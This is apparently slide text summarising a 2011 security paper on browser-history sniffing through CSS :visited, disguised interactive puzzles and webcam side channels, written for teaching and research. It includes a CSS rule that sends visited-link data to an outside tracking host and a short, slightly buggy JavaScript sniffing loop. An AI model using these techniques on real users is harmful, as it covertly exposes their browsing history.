Zachary WeinbergEric Y. Chen
Pavithra Ramesh JayaramanCollin Jackson
Carnegie Mellon University
I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history
IEEE Symposium on Security and Privacy, May 2011
2
3
Outline
IntroductionAutomated AttacksExp 1: Interactive AttacksExp 2: Side-Channel AttacksRelated WorkConclusion
4
Introduction
History Sniffing through CSS :visited Andrew Clover, 2002,
http://seclists.org/bugtraq/2002/Feb/271in HTML<a id="link1" href="http://google.com/">Visit Google!</a>
in CSS#link1:visited {
color: red;background: url(http://140.115.53.28/track.php?url=google.com);
}
5
Introduction
L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy make getComputedStyle act as though all links are
unvisited make certain CSS selectors act as though links are
always unvisited limits the CSS properties that can be used to style
visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke
The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense still vulnerable with interactive attacks
6
Introduction
Dongseok Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications Small sets of links (6~220) probed by real exploiters
46 popular websites, including one from Alexa Top100This makes interactive attacks possible
7
Introduction
What can history sniffers do? Benign:
Websites could use history sniffing to determine whether their users have visited known phishing sites.
Websites could seed visitors’ history with URLs made up for the purpose, and use the URLs to re-identify their visitors. Cookies
Malicious: Track visitors across sites for advertising purpose,
determining whether they also visit a site’s competitors. Attackers can construct more targeted phishing pages, by
impersonating only sites that a particular victim is known to visit
8
Automated Attacks
Direct sniffing
<style> a:visited { color: red; } </style>
var url_array = new Array('http://a.com', 'http://b.com');var visited_array = new Array(); var link_el = document.createElement('a');var computed_style = document.defaultView.getComputedStyle(link_el,
""); for (var i = 0; i < url_array.length; i++) {
link_el.href = array[i]; if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)'){ visited_array.push(url_array[i]); }
}
9
Automated Attacks
Indirect Sniffing Make visited and unvisited links take different
amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements.
Make visited and unvisited links cause different images to load. background-image style used in :visited rule Not requires JavaScript
10
Automated Attacks
Side-channel sniffing Timing attacks
the attacker can make the page take longer to lay out if a link is visited than if it is unvisited Transparent Underline Any other style rules in :visited
Defense Baron’s solution does well for all 3 types
(direct/indirect/side-channel) above
11
Exp 1: Interactive Attacks
Require victims to interact with malicious sites The authors claim that interactive attacks can be disguised
as “normal” interactive tasks that users will not find surprising or suspicious
Amazon’s Mechanical Turk Recruit 307 participants
All tasks in this experiment operate within the constraints of Baron’s defense Visited-link styles only change the color on the screen Pretend to be CAPTCHA tests CAPTCHA: Completely Automated Public Turing test to
tell Computers and Humans Apart
12
Exp 1: Interactive Attacks
1. Word CAPTCHA
Each word is a hyperlink to an URL that the attacker wishes to probe
If unvisited, it is drawn in the same color as the background.
13
Exp 1: Interactive Attacks
2. Character CAPTCHA
Seven-segment LCD symbols Every letter represents 3 URLs Site-supplied font
14
Exp 1: Interactive Attacks
4 + 5 = 9 ; 4 + F = A ; 5 + F = 6 ; 4 + 5 + F = 8 “ – “ is always-on
15
Exp 1: Interactive Attacks
3. Chessboard puzzle Each square contains a URL Only the pawns corresponding to visited sites are made visible Using SVG or text to control the pawns
16
Exp 1: Interactive Attacks
4. Pattern matching puzzle
17
Exp 1: Interactive Attacks
Randomly generated task instances corresponding to known proportions of visited and unvisited links.
18
Exp 1: Interactive Attacks
Automated history-sniffing exploits on all the participants URL set from wtikay.com
7012 commonly visited URLs (from Alexa Top 5000)
19
Exp 1: Interactive Attacks
20
Exp 1: Interactive Attacks
21
Exp 1: Interactive Attacks
22
Exp 1: Interactive Attacks
23
Exp 1: Interactive Attacks
24
Exp 2: Side-channel Attacks
Webcam attacks <blink> Random 20 URLs with 10 visited ones Variant 1:
Designed to comply with the WCAG standard for seizure safety
Variant 2: Make entire browser window flash Brighter color
25
Exp 2: Side-channel Attacks
Author test 100% accuracy for both variants in all condition
Will-lit room Person stays still in front of the computer In a dark room, accuracy dropped to 50%
Field test 60 / 307 participants
26
Exp 2: Side-channel Attacks
Field test
27
Exp 2: Side-channel Attacks
In real life, ChatRoulette service
The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor
28
Related Work
Page cache Felten et al., Timing Attacks on Web Privacy
DNS cache Felten et al., Timing Attacks on Web Privacy
Both tactics above Only for the first time Short-term history
Loadable cross-origin but only available to logged-in users Facebook, Gmail, Twitter, etc. JavaScript onerror event
29
Related Work
Cookie, Flash Player local shared objectsAd-blocker, Private browsing mode
30
Conclusion
Automated history sniffing attacks have successfully been blocked by Baron’s solution
Interactive attacks are notThis paper developed POC of 6 history
sniffing exploited against Baron’s defense 4 interactive attacks 2 detection of the screen through webcam